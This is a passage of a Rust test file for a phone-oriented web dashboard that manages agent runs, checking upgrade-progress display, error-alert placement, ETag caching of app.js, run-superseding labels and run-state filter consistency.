8834 assert!(APP_JS.contains("const label = btn.textContent;"));
8835 assert!(!APP_JS.contains("Neither direction is guarded"));
8836 }
8837
8838 #[test]
8839 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
8840 assert!(
8841 APP_JS.contains("state.health.version"),
8842 "the operator wants to know what is running even with nothing newer"
8843 );
8844 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
8845 }
8846
8847 #[test]
8848 fn the_upgrade_button_names_its_destination() {
8849 assert!(
8850 APP_JS.contains("`Update to ${update.to}`"),
8851 "pressing the button should not be a surprise about what it moves to"
8852 );
8853 }
8854
8855 #[test]
8856 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
8857 for stage in ["downloading", "replaced", "parking", "restarting"] {
8858 assert!(
8859 APP_JS.contains(&format!("\"{stage}\"")),
8860 "the phone must be able to tell {stage} apart from the others"
8861 );
8862 }
8863 assert!(APP_JS.contains(".waiting_on"));
8864 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
8869 assert!(APP_JS.contains("reconnects on its own"));
8870 }
8871
8872 #[test]
8873 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
8874 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
8883 ..APP_JS.find("function upgrade(").expect("upgrade")];
8884 assert!(
8885 !body.contains(
8886 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
8887 ),
8888 "a failed upgrade must not take the whole strip over the way it used to"
8889 );
8890 assert!(
8891 body.contains("upgradeFailNote"),
8892 "the failure has to reach the loop's own note instead"
8893 );
8894 assert_eq!(
8898 body.matches("upgradeFailNote].filter(Boolean).join")
8899 .count(),
8900 2,
8901 "both loop-why writers (quiet and control) must fold the note in"
8902 );
8903 }
8904
8905 #[test]
8906 fn an_overdue_upgrade_eventually_asks_for_a_human() {
8907 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
8910 assert!(APP_JS.contains("function upgradeOverdue("));
8911 }
8912
8913 #[test]
8914 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
8915 assert!(
8916 APP_JS.contains("Updated to ${upgradeInfo.to"),
8917 "the operator who asked for the restart wants to know it worked"
8918 );
8919 }
8920
8921 #[test]
8922 fn an_error_is_visible_from_where_the_button_is() {
8923 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
8928 ..APP_CSS.find(".alert-text").expect(".alert-text")];
8929 assert!(
8930 alert.contains("position: fixed"),
8931 "an error about the thing under your thumb has to be visible from \
8932 where your thumb is: {alert}"
8933 );
8934 assert!(
8935 alert.contains("z-index: 25"),
8936 "above the dock (20) and the run-actions FAB (15), so neither \
8937 buries it: {alert}"
8938 );
8939 assert!(
8940 alert.contains("var(--tap)"),
8941 "and clear of the dock and the home indicator: {alert}"
8942 );
8943 assert!(
8946 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
8947 "the FAB's column stays free: {alert}"
8948 );
8949 }
8950
8951 #[tokio::test]
8952 async fn an_older_attempt_says_what_replaced_it() {
8953 let fx = Fixture::start().await;
8954 let q = fx.queue();
8955 let runs = fx.runs();
8956 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
8957 write_run(&runs, first, RunStatus::Stalled);
8958 write_run(&runs, second, RunStatus::Blocked);
8959
8960 let mut t = Task::new(
8961 "one task".to_owned(),
8962 "do it".to_owned(),
8963 PathBuf::from("/repo"),
8964 Source::Human,
8965 );
8966 t.runs = vec![first.to_owned(), second.to_owned()];
8967 q.put(&mut t).expect("put");
8968
8969 let rows = fx.get("/api/runs").await.json();
8973 let by = |short: &str| -> Value {
8974 rows.as_array()
8975 .unwrap()
8976 .iter()
8977 .find(|r| r["short"] == short)
8978 .cloned()
8979 .unwrap_or(Value::Null)
8980 };
8981 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
8982 assert!(
8983 by("bbbb")["superseded_by"].is_null(),
8984 "the latest attempt is not superseded by anything"
8985 );
8986 assert!(APP_JS.contains("run.superseded_by"));
8988 assert!(APP_JS.contains("Superseded by"));
8989 }
8990
8991 #[tokio::test]
8992 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
8993 let fx = Fixture::start().await;
8994 let js = fx.get("/app.js").await;
9000 assert_eq!(js.status, 200);
9001 let tag = js
9002 .header("etag")
9003 .expect("an etag to revalidate against")
9004 .to_owned();
9005 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
9006 assert_eq!(
9007 js.header("cache-control"),
9008 Some("no-cache, must-revalidate"),
9009 "the phone has to ask every time"
9010 );
9011
9012 let again = fx
9015 .get_with("/app.js", &[("if-none-match", tag.as_str())])
9016 .await;
9017 assert_eq!(
9018 again.status, 304,
9019 "a deck it already has costs one round trip"
9020 );
9021 assert!(again.body.is_empty(), "304 carries no body");
9022
9023 let weak = fx
9026 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
9027 .await;
9028 assert_eq!(weak.status, 304);
9029 let stale = fx
9030 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
9031 .await;
9032 assert_eq!(stale.status, 200, "an older build must be replaced");
9033 assert!(stale.body.contains("renderRunActions"));
9034 }
9035
9036 #[test]
9037 fn the_deck_never_sends_the_operator_to_a_terminal() {
9038 assert!(
9041 !APP_JS.contains("Run `magi fold` first"),
9042 "the deck must offer the fold, not prescribe a shell command"
9043 );
9044 assert!(APP_JS.contains("foldRun:"));
9045 assert!(APP_JS.contains("resumeRun:"));
9046 assert!(APP_JS.contains("renderRunActions"));
9047
9048 assert!(APP_JS.contains("armedFold"));
9050 assert!(APP_JS.contains("Yes, fold worktrees"));
9051
9052 assert!(APP_JS.contains("can no longer be resumed"));
9055 }
9056
9057 #[test]
9058 fn a_finished_run_explains_itself_with_its_own_last_line() {
9059 assert!(
9065 !APP_JS.contains("collapsed on agent quota"),
9066 "a stall must not be explained by a cause the deck did not check"
9067 );
9068 assert!(
9069 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
9070 "and a block must not offer a guess with an `or` in it"
9071 );
9072
9073 assert!(
9077 APP_JS.contains("setText(r.event, run.event || \"\")"),
9078 "the run's last line is rendered unconditionally"
9079 );
9080 assert!(
9081 !APP_JS.contains("moving && run.event"),
9082 "and never gated on the run still moving"
9083 );
9084
9085 assert!(APP_JS.contains("lost to quota"));
9087 }
9088
9089 #[test]
9111 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
9112 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
9113 let shapes_body_start =
9114 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
9115 let shapes_close = APP_JS[shapes_body_start..]
9116 .find("].map(")
9117 .expect("the shape list is closed by its done-computing .map(...)")
9118 + shapes_body_start;
9119 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
9120
9121 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
9122 for entry in shapes_src.split('{').skip(1) {
9123 let waiting = entry.contains("waiting: true");
9124 let dead = entry.contains("live: \"dead\"");
9125 let status_at =
9126 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
9127 let status_end = entry[status_at..]
9128 .find('"')
9129 .expect("the status string is closed")
9130 + status_at;
9131 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
9132 }
9133 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
9134
9135 let done_rule_marker = "done: !";
9139 let done_rule_at = APP_JS[shapes_close..]
9140 .find(done_rule_marker)
9141 .expect("the done rule follows the shape list")
9142 + shapes_close
9143 + done_rule_marker.len();
9144 let includes_at = APP_JS[done_rule_at..]
9145 .find(".includes(shape.status)")
9146 .expect("the done rule ends in .includes(shape.status)")
9147 + done_rule_at;
9148 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
9149 .trim()
9150 .trim_start_matches('[')
9151 .trim_end_matches(']')
9152 .split(',')
9153 .map(|s| s.trim().trim_matches('"'))
9154 .filter(|s| !s.is_empty())
9155 .collect();
9156
9157 let shapes: Vec<(bool, String, bool, bool)> = shapes
9158 .into_iter()
9159 .map(|(waiting, status, dead)| {
9160 let done = !not_done.contains(&status.as_str());
9161 (waiting, status, dead, done)
9162 })
9163 .collect();
9164
9165 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
9169 if waiting {
9170 return "waiting";
9171 }
9172 if dead
9173 && !matches!(
9174 status,
9175 "merged" | "ready" | "stalled" | "blocked" | "failed" | "verified_noop"
9176 )
9177 {
9178 return "stale";
9179 }
9180 match status {
9181 "merged" | "ready" => "landed",
9182 "stalled" | "blocked" | "failed" | "verified_noop" => "ended",
9183 _ => "flight",
9184 }
9185 }
9186
9187 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
9190 match filter_key {
9191 "active" => !done,
9192 "flight" => !done && !waiting && !dead,
9193 "stale" => !done && !waiting && dead,
9194 "waiting" => waiting,
9195 "done" => done,
9196 "all" => true,
9197 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9198 }
9199 }
9200
9201 let compatible = |section: &str, filter_key: &str| {
9202 shapes.iter().any(|(waiting, status, dead, done)| {
9203 run_section(*waiting, status, *dead) == section
9204 && filter_matches(filter_key, *waiting, *dead, *done)
9205 })
9206 };
9207
9208 let expected = [
9213 ("waiting", [true, false, false, true, true, true]),
9214 ("stale", [true, false, true, false, false, true]),
9215 ("flight", [true, true, false, false, false, true]),
9216 ("landed", [false, false, false, false, true, true]),
9217 ("ended", [false, false, false, false, true, true]),
9218 ];
9219 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
9220
9221 for (section, wants) in expected {
9222 for (filter_key, want) in filter_keys.iter().zip(wants) {
9223 assert_eq!(
9224 compatible(section, filter_key),
9225 want,
9226 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
9227 );
9228 }
9229 }
9230
9231 assert!(
9234 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
9235 );
9236 assert!(APP_JS.contains(
9237 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
9238 ));
9239 assert!(APP_JS.contains(
9240 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
9241 ));
9242 }
9243
9244 #[tokio::test]
9245 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
9246 let dir = tempfile::tempdir().expect("tempdir");
9250 let explicit = dir.path().join("not-a-checkout");
9251 std::fs::create_dir_all(&explicit).expect("create dir");
9252 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
9253
9254 let missing = dir.path().join("does-not-exist-at-all");
9255 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
9256 }
9257}